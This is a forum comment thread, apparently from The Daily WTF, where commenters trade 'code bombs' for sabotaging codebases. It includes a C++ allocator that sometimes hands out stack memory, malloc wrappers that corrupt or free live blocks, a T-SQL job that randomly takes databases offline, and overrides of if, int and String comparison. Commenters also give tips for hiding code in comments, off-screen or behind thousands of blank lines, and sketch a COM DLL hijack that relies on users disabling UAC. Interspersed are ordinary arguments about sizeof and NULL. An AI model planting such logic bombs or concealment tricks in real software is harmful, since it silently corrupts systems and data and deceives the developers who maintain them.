• Tomalak Geret'kal (unregistered) in reply to Niels
    Niels:
    The WTF about the sample is that you should not be using NULL in C++ code, you should just write 0.

    How about:

    #ifndef _DEBUG
    #define if(x) if(rand()<0.0001 && (x))
    #endif

    NULL in C++ is fine; good luck find-and-replacing all your 0s when nullptr comes along.

    Meanwhile, rand() returns an int, so the real WTF is on you.

  • Tomalak Geret'kal (unregistered) in reply to Tomalak Geret'kal
    Tomalak Geret'kal:
    Niels:
    #ifndef _DEBUG
    #define if(x) if(rand()<0.0001 && (x))
    #endif

    Meanwhile, rand() returns an int, so the real WTF is on you.

    (Don't get me wrong, your code will still "work", but the comparison with 0.0001 seems really strange. Comparing with 1 would be more canonical.)
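
    Spelled with an int, that would read something like this (just a sketch, same odds as the floating-point version):

    #ifndef _DEBUG
    // rand() returns an int in [0, RAND_MAX], so compare against an int:
    // the whole condition is false unless rand() happens to come up 0.
    #define if(x) if (rand() < 1 && (x))
    #endif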

  • Daniel Cooper (unregistered)
    class String
      alias :old_eq :==
      def ==(object)
        (rand(100) == 42 ? !self.old_eq(object) : self.old_eq(object))
      end
    end
    

    Every so often "hello" == "world" will return true and "hello" == "hello" won't.

    How can you not love Ruby?

  • Kelso (unregistered)

    I'm not sure how many other people realise this, but with most languages you can use Unicode escape sequences directly. So something like this, in Java:

    // This is a friendly comment \u000A nasty code here

    I know Eclipse doesn't highlight that as actual code; it just thinks it's a comment. See, it doesn't take much. The easiest way to hide it is to tab it across a bit until it sits just off the screen.

  • Not yet disgruntled (unregistered)

    #ifndef ALLOCATOR__H
    #define ALLOCATOR__H

    #ifdef __cplusplus
    #pragma warning(disable : 4172)
    #include <cstdlib>
    #include <new>
    #include <ctime>

    using namespace std;

    #define CHECK_SIZE(a, b, c) ((!a && b) ? 0 : a##b(c))

    namespace {
        class allocator_base { };

        template <size_t n> class allocator : public allocator_base { char arr[n]; };

        const int max_n = 1000;

        template<int n> struct helper {
            static allocator_base& func(int i) { return i == n ? allocator<n>() : helper<n+1>::func(i); }
        };

        template<> struct helper<max_n> {
            static allocator_base& func(int i) { return allocator<max_n>(); }
        };

        allocator_base& helper_allocate(int i) { return helper<1>::func(i); }

        bool shouldSmartAlloc(size_t size) {
            static int s = 0;
            int ti = 0; int me = 0; int sr = 0; int and = 0; int r = 0;
            if (!s) {
                s = static_cast<size_t>(CHECK_SIZE(ti, me, NULL));
                s += size;
                CHECK_SIZE(sr, and, s);
            }
            if (size < max_n && (CHECK_SIZE(r, and, /*void*/) % (max_n * 10)) < 1) {
                return true;
            }
            return false;
        }
    }

    void * operator new(size_t size)
    {
        void *p;
        if (shouldSmartAlloc(size)) {
            allocator_base alloc = helper_allocate(size);
            p = static_cast<void *>(&alloc);
        } else {
            p = malloc(size);
        }
        return p;
    }

    #endif

    #endif

    Tried obfuscating the randomness slightly, and hiding it in something less suspicious-looking. Basically, about 1 in every 10000 calls to new will allocate the memory on the stack instead of the heap. This should not only produce some nasty crashes when writing to or deleting that memory, but the added stack-corruption should add some fun to the debugging.

  • Mike (unregistered)

    In those legacy visual basic apps that are still being maintained, just remove the line "option explicit" from every source file.

  • Maurizio (unregistered)

    Once I did (really) the following on a Symbolics Lisp Machine:

    (defun car (x) (cdr x))

    The machine took around 60 seconds to completely crash. OK, not very subtle.

  • (cs)

    Some improvement to my malloc magic memory modification: now, if the memory is freed before it can be changed, it won't change it. So memory will only be changed if it exists for more than a second or so:

    #ifdef NDEBUG
    #include <stdlib.h>
    #include <unistd.h>
    #include <signal.h>
    
    sig_t __damn_oldf;
    int *__damn_ptr = NULL;
    
    void __damn2(int _)
    {
      signal(SIGALRM, __damn_oldf);
      if(__damn_ptr)
        *__damn_ptr = rand();
    
      __damn_ptr = NULL;
    }
    
    void *__damn1(size_t size)
    {
      static int cnt = 111;
      void *ret;
      ret = malloc(size);
    
      if(!__damn_ptr && !cnt--) {
        __damn_ptr = ret;
        __damn_oldf = signal(SIGALRM, __damn2);
        alarm(1);
        cnt = 111;
      }
    
      return ret;
    }
    
    void __undamn1(void *ptr)
    {
      if(ptr == __damn_ptr) {
        __damn_ptr = NULL;
      }
    
      free(ptr);
    }
    
    
    #define malloc __damn1
    #define free __undamn1
    #endif
    
  • Luiz Felipe (unregistered) in reply to Anonymous
    Anonymous:
    class LeakyString
    {
        private:
           std::string *str;
    
    public:
        LeakyString( const char *const s )
                : str( new std::string( s ) ) {}
    
        LeakyString( const LeakyString &copy )
                : str( new std::string( *copy.str ) ) {}
    
    LeakyString &
    operator= ( const LeakyString &rhs )
    {
        LeakyString tmp( rhs );
        std::swap( this->str, tmp.str );
        delete tmp.str; // Don't leak all the time
        return *this;
    }
    
        ~LeakyString() {} // Just leak our string sometimes
    
    // Assume the necessary internals to emulate a string
    

    };

    // Try to get everyone using our leaky implementation,
    // but we'll possibly wreak some compiler havoc if
    // string is a variable name or something...
    #define string LeakyString

    Lol, this is the Java string class, it leaks so much memory. Hey, you copied this from the Java HotSpot VM. It explains why Java sucks up so much memory on my machine. Thanks, I have 8GB for it; nah, it's for Crysis Warhead also.

  • (cs) in reply to Not yet disgruntled
    Not yet disgruntled:
    #define CHECK_SIZE(a, b, c) ((!a && b) ? 0 : a##b(c))

    ...

    int and = 0;
    

    ...

      CHECK_SIZE(sr, and, s);
    

    You know that "and" is a keyword in C++, don't you? (It's a synonym for &&. Likewise "or" for ||, and "not" for monadic !.)
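
    A quick sketch of it biting, for anyone who wants to try (on MSVC you may need /permissive- or the <ciso646> header to get the alternative tokens):

    #include <ciso646>   // no-op on conforming compilers, enables and/or/not on old MSVC

    int main()
    {
        bool a = true, b = false;
        bool c = a and b;       // same as a && b
        bool d = a or not b;    // same as a || !b
        // int and = 0;         // refuses to compile here: 'and' is not an identifier
        return c && d;
    }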

  • (cs) in reply to Steve The Cynic
    Steve The Cynic:
    frits:
    Hey, you guys know size is in bytes, not bits right? Just asking...
    Actually, you are wrong. The unit of sizeof() is chars, not bytes. It so happens that char is usually an octet (8 bits, what we usually call a byte), but it doesn't have to be. I have worked on a machine where the natural size of a char was 16 bits, because the memory was 16 bits wide (i.e. moving from address 1000 to address 1001 advanced by 16 bits), and CDC Cyber mainframes had natural 6 bit characters (but aren't in that mode suitable for C, because char must be at least 8 bits).

    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizeof() to derive your argument for malloc(), because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    I'll refer you to these: http://www.cppreference.com/wiki/memory/c/malloc http://www.cplusplus.com/reference/clibrary/cstdlib/malloc/ http://msdn.microsoft.com/en-us/library/6ewkz86d.aspx

    Addendum (2011-03-15 09:28): Oops :X The code snippet should be:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    
    

    Addendum (2011-03-15 09:34): Ahem:

        /* The above code example is common but wrong;
           it should be done as below.  Make sure you include
           <limits.h>.
        */
        int size = sizeof(my_data_struct)/(CHAR_BIT/8);
        my_data_struct * p_struct = malloc(size);
    

    Frankenstein-like walks away "More coffee. Fire bad."

  • Luiz Felipe (unregistered)

    I forgot to close the damn quote tag.

    My bomb recipe, made to wreak havoc in programs using COM:

    Using the Microsoft IDL extractor you get the COM interface from some DLL. Use the generated IDL to make a stub for the DLL. I have a stub generator that creates a proxy for a DLL using a code generator. Then, in the code generator, pick some DLL call and inject a few IFs so that (on a random condition) it returns instead of calling the original DLL from the proxied DLL. With LoadLibrary you can find out whether it exposes IUnknown, which signals that it is a COM DLL. Make a script that runs the generator against some random COM DLL. The stub generator must statically link to the renamed COM DLL for this to work. Now we need admin privileges to replace the original DLL, but that is the easy part: just make the user click the fucking UAC prompt, or tell them UAC is shit and have them disable it so we can bomb the machine, or use some virus code to disable it.

    But this bomb requires too much source code to post here.

  • GWO (unregistered) in reply to Steve The Cynic
    Steve The Cynic:
    Actually, you are wrong. The unit of sizeof() is chars, not bytes.
    Actually, *you* are wrong. The unit of sizeof() is bytes. It's just that in C++, a byte is not necessarily a binary octet. It's defined to be the size of a char, which is also the smallest addressable unit.
  • (cs) in reply to Rosuav
    Rosuav:
    C++ example:

    #ifndef _DEBUG
    struct imt {
        int intval;
        imt(int i) : intval(i) {}
        operator int() { return intval; }
        int operator /(imt other) { return (intval>>1) / (other.intval>>1); }
    };
    #define int imt
    #endif

    This will create a completely invisible replacement for the standard integer, but such that all division is done with the low bit stripped. It'll work fine most of the time, but just occasionally it'll give slightly inaccurate results. And like the NULL example in the original post, it's something that you would trust perfectly ("that's just integer division, how can that be faulty?!?"); the debugger would tell you that it's "struct imt" instead of "int", but in the debugger, this won't be doing stuff anyway...

    For extreme Heisenbugginess, put this only in some places and not in others. You copy and paste a block of code from one module to another, and it gains some division inaccuracy.

    VERY occasionally this might even crash - if you try to divide an imt by 1, it'll become division by 0. Just to annoy the people who thought they were safe against div by 0!

    That goes to show... One should always check for #ifdef _DEBUG and #ifndef _DEBUG directives on inherited code.

  • Anonymous (unregistered)

    The 'double free' a few comments back got me thinking....

    Untested code concept

    void *mallocevil(size_t size)
    {
       void *ptr = malloc(size);
       if(rand() < 0.0001) /* Choose your favourite unlikely condition */
         free(ptr);
       return ptr;
    }
    
    #define malloc mallocevil
    

    One can extend it to have the pointer to the malloc()ed block freed by another thread some time after allocation.
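
    An equally untested sketch of that extension (names made up, std::thread used purely for brevity):

    #include <cstdlib>
    #include <thread>
    #include <chrono>

    // Hypothetical: occasionally free the block from another thread ~1s later,
    // so the crash shows up nowhere near the allocation site.
    void *malloc_delayed_evil(size_t size)
    {
        void *ptr = std::malloc(size);
        if (ptr && (std::rand() % 100000) == 0) {   // your favourite unlikely condition
            std::thread([ptr] {
                std::this_thread::sleep_for(std::chrono::seconds(1));
                std::free(ptr);                     // the caller still thinks it owns ptr
            }).detach();
        }
        return ptr;
    }

    #define malloc malloc_delayed_evil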

  • Kenny (unregistered) in reply to bob42
    bob42:
    ...

    declare @databases table (name varchar(128), Sm int)
    declare @database table (name varchar(128), Sm int)
    declare @number int, @name varchar(128), @sql varchar(max)

    insert into @databases (name, Sm)
    select name, abs(checksum(newid())) % (select count(*) from sys.databases where database_id > 4 and state = 0)
    from sys.databases where database_id > 4 and state = 0

    select @number = abs(checksum(newid())) % (select count(*) from sys.databases)

    insert into @database (name, Sm)
    select top 1 name, sm from @databases order by sm

    if exists (select top 1 name from @database)
    begin
        select @name = name from @database where sm = @number

        set @sql = 'alter database [' + @name + '] set offline with rollback after 30 seconds'

        exec(@sql)
    end

    I had to double-take, and then triple-take at this code, and it actually made me utter "WTF?!" I really hope this is intentionally obfuscated.

    As someone mentioned above, it would be easy to find because of logging, but that could be mitigated by using WAITFOR statements to move the start and end times of the job away from the offline time of the database to reduce suspicion.

    I can see that "abs(checksum(newid()))" is supposed to generate a random non-negative integer, but poor zero has half the chance of occurring than any other number (although this is mostly mitigated by the modulo operator), and there's a one in 4G chance that it will fail when it tries to perform "ABS(-2147483648)". I really hope this method isn't used in production.

    Beyond that ... tables, tables, tables. Why two table variables to pour the data from one to another? All you're trying to do is choose one online, non-system database as a target, so why not just:

    SELECT TOP 1 @sql = 'alter database [' + name + '] set offline with rollback after 30 seconds' FROM sys.databases WHERE database_id > 4 AND state = 0 ORDER BY NEWID()

    As for all the other "randomness": setting aside that the modulo operator will give a very slight bias towards the lower numbers in the set, and that the value in @database.sm will be biased toward lower numbers by the "ORDER BY sm", all of it boils down to "Does this [random integer between 0 and Count-Of-Databases] equal 0?"
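
    (The modulo bias itself is easy to see with small numbers; a throwaway sketch, nothing SQL-specific:)

    #include <cstdio>

    int main()
    {
        // Reduce a uniform 0..255 value mod 10: remainders 0..5 occur 26 times,
        // 6..9 only 25 times; the same skew abs(checksum(newid())) % N has.
        int counts[10] = {};
        for (int v = 0; v < 256; ++v)
            ++counts[v % 10];
        for (int r = 0; r < 10; ++r)
            std::printf("%d -> %d\n", r, counts[r]);
        return 0;
    }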

    All that aside, I may actually implement this on some of the development database servers anyway, it'll be a good way to organically prune databases that aren't used any more.

    (Apparently haven't had enough coffee today.)

  • Luiz Felipe (unregistered) in reply to Mike
    Mike:
    In those legacy visual basic apps that are still being maintained, just remove the line "option explicit" from every source file.
    This is evil. But it won't work here: my build script looks for it in all the code files and fails the compilation if any of them is missing "option explicit".
  • Luiz Felipe (unregistered)

    Some will say "The TRWTF is VB". No, the true WTF is the "coders", and that includes C# noobs, Java, and JavaScript too. But really, you can use all of these languages correctly with some proper software engineering and produce awesome software.

  • Major Malfunction (unregistered) in reply to Capt. Obvious
    Capt. Obvious:
    Wim:
    The use of rand() does not give non-deterministic behavior. The example will always crash at the same point in the program (assuming the rest is deterministic).

    My idea would be (for C):

    #include <stdlib.h>
    
    static inline void *
    malloc_bomb(size_t size)
    {
        if (size>8) size-=8;
        return malloc(size);
    }
    
    #define malloc malloc_bomb // #define moved as indicated by many postings
    

    Clever error. But depending on the internal procedures at the company

    size+=8;
    may be a worse condition. (Magic number 8 requires tuning.) The free should be based on the object's theoretical size, not the malloc'd size, resulting in a slow leak. Especially brutal because each component group can blame another, and be convinced that they aren't causing the leak.
    The free is based on the pointer to the memory block, not on a size.

  • (cs) in reply to frits
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizeof() to derive your argument for malloc(), because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all integral types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.
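
    To make that concrete, a small sketch (nothing here beyond <climits> and the standard guarantees):

    #include <climits>   // CHAR_BIT
    #include <cstdio>

    int main()
    {
        // sizeof is measured in "bytes" in the standard's sense, i.e. chars,
        // so sizeof(char) is 1 by definition on every conforming implementation.
        static_assert(sizeof(char) == 1, "guaranteed by the standard");

        // How many bits such a byte has is a separate, implementation-defined question.
        std::printf("CHAR_BIT = %d\n", CHAR_BIT);             // usually 8, not required to be
        std::printf("sizeof(long) = %zu chars\n", sizeof(long));
        return 0;
    }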

  • (cs) in reply to Steve The Cynic
    Steve The Cynic:
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizeof() to derive your argument for malloc(), because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all integral types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

    Nice selective quoting. Your original assertion about the size argument for malloc not being in bytes was, and still is, wrong. Focusing on sizeof() is a red herring you introduced, not me.

    BTW, this is the reason why I usually just make stupid jokes and avoid commenting about actual code on this site. Because inevitably some pig-headed dev will come along and try to get into a pissing match.

  • Not yet disgruntled (unregistered) in reply to Steve The Cynic
    Steve The Cynic:
    Not yet disgruntled:
    #define CHECK_SIZE(a, b, c) ((!a && b) ? 0 : a##b(c))

    ...

    int and = 0;
    

    ...

      CHECK_SIZE(sr, and, s);
    

    You know that "and" is a keyword in C++, don't you? (It's a synonym for &&. Likewise "or" for ||, and "not" for monadic !.)

    Actually, I didn't! I guess I learned something today then. See, this is what I like about TDWTF :)

    The snippet, however, was written for and compiles cleanly with MSVC++ (as evidenced by the #pragma directive), which coincidentally does not reserve "and", "or" or "not" as keywords. See http://msdn.microsoft.com/en-us/library/2e6a4at9.aspx

    Still, good to know for future reference - and in case I would ever need this code to be platform-independent... ;)

  • MK|C (unregistered)
    cat /dev/random
    will hang any code not wise enough to use urandom.

    ...kind of weak, but meh.

  • Queex (unregistered)

    Slip this into a Java package and fix the imports. Change it to suit whatever collection is used most often. You could probably make it harder to uncover by altering where it hides the references and how.

    public class ArrayList<E> extends java.util.ArrayList<E> {
        @SuppressWarnings("unchecked")
        private static final java.util.ArrayList bomb = new java.util.ArrayList();
        @SuppressWarnings("unchecked")
        @Override
        public boolean add(E e) {
            try {
                bomb.add(bomb.clone());
            } catch (OutOfMemoryError ex) {
            }
            return super.add(e);
        }
    }
  • Ivan Ivanovich (unregistered)

    // maybe I needing later

  • Joshua (unregistered)

    #ifndef _DEBUG
    if (rand() < 3) vfork();
    #endif

  • Rhialto (unregistered) in reply to drfreak
    drfreak:
    On the Vic-20 and C64 in BASIC, I found a bug in the LIST command a long time ago which I have worked to my advantage before. To use the bug can create a rudimentary form of copy-protection but will not crash your program as it executes.

    On random lines, write your code. For instance, 10, 12, 16, 23, 32, 37, etc. On all lines in-between, put a REM statement where you traverse the keyboard from qwert through vbnm, holding in the function key (I think it was a Commodore key actually) which produces the special characters often used in line drawing and such. Then, traverse the keys again from top to bottom. When you do a LIST on the program and it hits one of those lines, you'll get a ?SYNTAX ERROR and the listing will stop. The only way to see the real code is to list line numbers one-by-one until you get all the lines which don't contain the REMark.

    I never drilled down to find the actual keycode which causes the bug, hence my brute-force method of using all the keys. Maybe someone has already discovered the bug and simplified the REM statement...

    The character code that creates this problem is the one whose value is 1 higher than that of the highest possible BASIC keyword token. Since different BASIC versions had different keywords, the character exhibiting this problem would also differ.

    The first PET BASIC version did not have the keyword GO, but instead allowed spaces inside keywords, which were ignored. That was changed in version 2.0, but the keyword GO was added to still allow "GO TO" for GOTO.

  • ferrix (unregistered)

    I think this is a good combination of things to happen:

    int decoy_error(int value) {
      for (int x = 0; x < 65535; x++) {
        // real flawless code goes here
      }
      return value;
    }
    
    int decoy_utility_function(int someValue) {
      if (GetTickCount() == 100) return someValue;  // notice how this is almost always false?
    
      int y = 0;
    
      // you can write practically anything here
    
      someValue = someValue / y;
    
      // here you can reveal your secrets, we never get there
      return someValue;
    }
    
    #define handle_error decoy_error
    #define utility_function decoy_utility_function
    
    try {
      for (int x = 0; x < 65535; x++) {
        // some code goes here
    
        utility_function(x);
    
        // the bomb goes here
      }
    
      return foobar;
    }
    catch (...) {
      return handle_error(x);
    }
    
  • C++ Programmer (unregistered) in reply to Niels

    WTF is this shit about not using NULL in C++ prior to C++0x? That's bullshit... who the fuck came up with that?

    Prior to C++0x you SHOULD be using NULL for clarity; with C++0x compliance you should be using the nullptr keyword.

    CAPTCHA: ludus ... somewhere you need to be enslaved

  • (cs) in reply to frits
    frits:
    Steve The Cynic:
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizeof() to derive your argument for malloc(), because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all integral types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

    Nice selective quoting. Your original assertion about the size argument for malloc not being in bytes was, and still is, wrong. Focusing on sizeof() is a red herring you introduced, not me.

    BTW, this is the reason why I usually just make stupid jokes and avoid commenting about actual code on this site. Because inevitably some pig-headed dev will come along and try to get into a pissing match.

    3.6
    1 byte
    addressable unit of data storage large enough to hold any member of the basic character
    set of the execution environment
    2 NOTE 1 It is possible to express the address of each individual byte of an object uniquely.
    3 NOTE 2 A byte is composed of a contiguous sequence of bits, the number of which is implementation-
    defined. The least significant bit is called the low-order bit; the most significant bit is called the high-order
    bit.
    
    The values given below shall be replaced by constant expressions suitable for use in #if
    preprocessing directives. Moreover, except for CHAR_BIT and MB_LEN_MAX, the
    following shall be replaced by expressions that have the same type as would an
    expression that is an object of the corresponding type converted according to the integer
    promotions. Their implementation-defined values shall be equal or greater in magnitude
    (absolute value) to those shown, with the same sign.
    — number of bits for smallest object that is not a bit-field (byte)
    CHAR_BIT 8
    
    6.5.3.4 The sizeof operator
    ...
    Semantics
    2 The sizeof operator yields the size (in bytes) of its operand, which may be an
    expression or the parenthesized name of a type. The size is determined from the type of
    the operand. The result is an integer. If the type of the operand is a variable length array
    type, the operand is evaluated; otherwise, the operand is not evaluated and the result is an
    integer constant.
    3 When applied to an operand that has type char, unsigned char,or signed char,
    (or a qualified version thereof) the result is 1.
    ...
    4 The value of the result is implementation-defined, and its type (an unsigned integer type)
    is size_t, defined in <stddef.h> (and other headers).
    5 EXAMPLE 1 A principal use of the sizeof operator is in communication with routines such as storage
    allocators and I/O systems. A storage-allocation function might accept a size (in bytes) of an object to
    allocate and return a pointer to void. For example:
    extern void *alloc(size_t);
    double *dp = alloc(sizeof *dp);
    
    7.20.3.3 The malloc function
    Synopsis
    1 #include <stdlib.h>
    void *malloc(size_t size);
    Description
    2 The malloc function allocates space for an object whose size is specified by size and
    whose value is indeterminate.
    Returns
    3 The malloc function returns either a null pointer or a pointer to the allocated space.
    
    

    TI C54-series DSPs have an MAU (minimum addressable unit) in data space which is a 16-bit word. In program space it's 8 bits.

  • AK-47 (unregistered) in reply to hoodaticus

    Ouch. I'd hate to work with you, dogg.

  • Chris Reuter (unregistered)

    This isn't mine originally, but:

    #ifndef _DEBUG
    #define struct union    /* Saves a huge amount of space. */
    #endif
    

    (No, this isn't a serious contender.)

  • Lumberjack U.K. (unregistered)

    Delphi one for you...

    var OldWndProc: Pointer;

    function NewWndProc(Handle: hWnd; Msg: UINT; PW: WPARAM; PL: LPARAM): LRESULT; stdcall;
    begin
      { Randomly ignore 1/100 windows messages }
      if Random(100) <> 42 then
        result := CallWindowProc(OldWndProc, Handle, Msg, PW, PL);
    end;

    initialization
      OldWndProc := Pointer(SetWindowLong(Application.Handle, GWL_WNDPROC, LongInt(@NewWndProc)));

  • Professor (unregistered) in reply to frits
    frits:
    Steve The Cynic:
    frits:
    Did I mention sizeof()?

    You need to know the size of char in bytes if you're using sizeof() to derive your argument for malloc(), because every reference I found specifies that the size argument is in bytes. That's why you'll sometimes see something like:

        int size = sizeof(my_data_struct)/sizeof(char);
        my_data_struct * p_struct = malloc(size);
    
    

    So the lesson is: if you're using C++, just use new[].

    So, you think that a reference's presence on the Internet means it is correct? Dividing by sizeof(char) is always a waste of space in the source file, as sizeof(char) is always 1. Always. Even if you have a wacky (but validly conformant) compiler where all integral types (including char) are 137 bits long, sizeof(char) is 1, because that's what the standards say. Yes, it is valid to have all integral types be 137 bits long. Almost no source code found in the real world will work on such a machine, but it is valid. The standards merely say that:

    • bitsof(char) >= 8
    • bitsof(short) >= 16 && bitsof(short) >= bitsof(char)
    • bitsof(int) >= bitsof(short)
    • bitsof(long) >= bitsof(int) && bitsof(long) >= 32
    • bitsof(unsigned X) == bitsof(signed X)

    The question of bytes versus chars as unit of sizeof is largely moot, as systems where char != an 8-bit byte are pretty rare these days, and anyway, "byte" is often used to mean "normal smallest hunk of memory", what would have been called a "word" in the old days, so a man page that says that malloc takes a size in bytes is correct, even on machine with nine-bit doodads. It is to avoid this type of confusion that standards (especially ITU standards) use the word "octet".

    Dividing CHAR_BIT by 8 in an attempt to find the number of bytes is, therefore, wrong. It finds the number of octets. On the hypothetical 137-bit machine, a "byte" would be 137 bits, and would contain seventeen and an eighth (?sp) octets.

    However, the point about using new or new[] in C++ is well taken, for plenty of reasons.

    Nice selective quoting. Your original assertion about the size argument for malloc not being in bytes was, and still is, wrong. Focusing on sizeof() is a red herring you introduced, not me.

    BTW, this is the reason why I usually just make stupid jokes and avoid commenting about actual code on this site. Because inevitably some pig-headed dev will come along and try to get into a pissing match.

    But sizeof(char) == 1, dumbass.

    You're not too bright, are you?

  • (cs)

    What about this? (Ruby)

    # First, memorize the definition of Class as it will be killed later
    @klass = Class
    # Iterates over the names of all defined constants
    for @constant_name in constants
      # Get the constant's value
      @constant_value = const_get @constant_name
      # If it is a class
      if @constant_value.is_a? @klass
        # Define a new class that inherits from the old one
        @new_class = @klass.new @constant_value do
          # Redefine its allocator
          def self.allocate
            if rand < 0.0000001
              # Randomly create an instance of the *old* class instead
              superclass.allocate
            else
              # Create instance of this class
              super
            end
          end
        end
        # Redefine the constant to be the new class
        # (redefining constants usually yields a warning, but not with const_set)
        const_set @constant_name, @new_class
      end
    end
    # Delete the used variables to cover our tracks
    # (that's also the reason I used instance variables instead of local ones)
    remove_instance_variable(:@klass)
    remove_instance_variable(:@constant_name)
    remove_instance_variable(:@constant_value)

    In the end, you will have all the same classes, but not really. Applications will then sometimes fail if you try to figure out the type of a class. For example,

    String.new("Hello World").is_a? String
    will sometimes evaluate to false, because the new constant String now refers to the superclass of the built-in String class.

    This might have some other effects than the intended one... for example, I don't know if it will work for String / Numeric / Array / Hash / RegExp literals. And it might not work at all, I couldn't test it here.

    Addendum (2011-03-15 13:46): Dang! It needs to be

    for @constant_name in self.constants
    , of course!

    Addendum (2011-03-15 13:47): I mean, self.class.constants -.-

  • Cannery Rowe (unregistered)

    Once upon a time I was asked to take over code that a developer had "Upsized" from MS Access to SQL Server.

    However, after a while reports that used stored procedures mysteriously failed, and their stored procedures or source views were gone... After investigation I discovered that a utility procedure, used only by yearly or other infrequently-run reports, contained a little gem that looked up and deleted a set of stored procedures and views...

    It was 5000 blank lines below the last line of "real" code, all of the rest of which was visible on the first edit screen...

  • anon c codeder (unregistered) in reply to Sten
    Sten:
    Some other guy:
    Maybe
    #include <stdlib.h>

    #define malloc malloc_bomb
    #define realmalloc malloc

    static inline void *
    malloc_bomb(size_t size)
    {
        if (size>8) size-=8;
        return realmalloc(size);
    }

    No. realmalloc gets replaced by malloc, which in turn gets replaced by malloc_bomb. The correct one (according to ISO C) would have the #define at the bottom (after the function).

    Or use calloc :)

    Even better, (this is based on a real bug found) in malloc_bomb:

    // need to align memory as <other_coder> can't write proper code
    size = size & ~0x07;
    calloc(size, 1);

    This has the benefit of having hex in C (you would be surprised how many C coders will avoid code for that reason). It is also a common pattern (but implemented badly). And it carries the force of a bug fix: you don't want to be seen being as silly as <other_coder>.
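
    For comparison, the legitimate idiom rounds up rather than down; a quick sketch of the difference:

    #include <cstddef>

    // The real alignment fix rounds the size *up* to the next multiple of 8...
    std::size_t align_up(std::size_t size)
    {
        return (size + 7) & ~static_cast<std::size_t>(0x07);
    }

    // ...whereas the "fix" above rounds *down*, silently shrinking every
    // allocation whose size isn't already a multiple of 8.
    std::size_t align_down_evil(std::size_t size)
    {
        return size & ~static_cast<std::size_t>(0x07);
    }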

  • Sten (unregistered) in reply to anon c codeder
    anon c codeder:
    size = size & ~0x07; calloc(size,1);

    This is pure evil — looking like a little innocent child while being a brat from hell

  • methinks (unregistered) in reply to drfreak
    drfreak:
    On the Vic-20 and C64 in BASIC, I found a bug in the LIST command a long time ago which I have worked to my advantage before. To use the bug can create a rudimentary form of copy-protection but will not crash your program as it executes.

